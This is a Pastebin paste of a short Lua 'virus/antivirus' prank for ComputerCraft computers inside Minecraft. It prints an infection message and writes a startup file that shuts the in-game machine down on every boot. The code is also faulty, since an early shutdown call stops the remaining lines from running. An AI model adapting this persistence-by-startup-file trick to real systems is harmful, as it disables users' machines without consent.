Advertisement
100xdonaldx001

Computercraft Virus/Antivirus

Sep 10th, 2013
555
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1. print("Your Computer Is Infected")
  2. sleep(1)
  3. os.shutdown()
  4. f = io.open("startup","w")
  5. f:write("os.shutdown()")
  6. f:close()
  7. os.shutdown()
  8. fs.delete("startup","w")
  9. print("Virus Successfully Uninstalled.")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement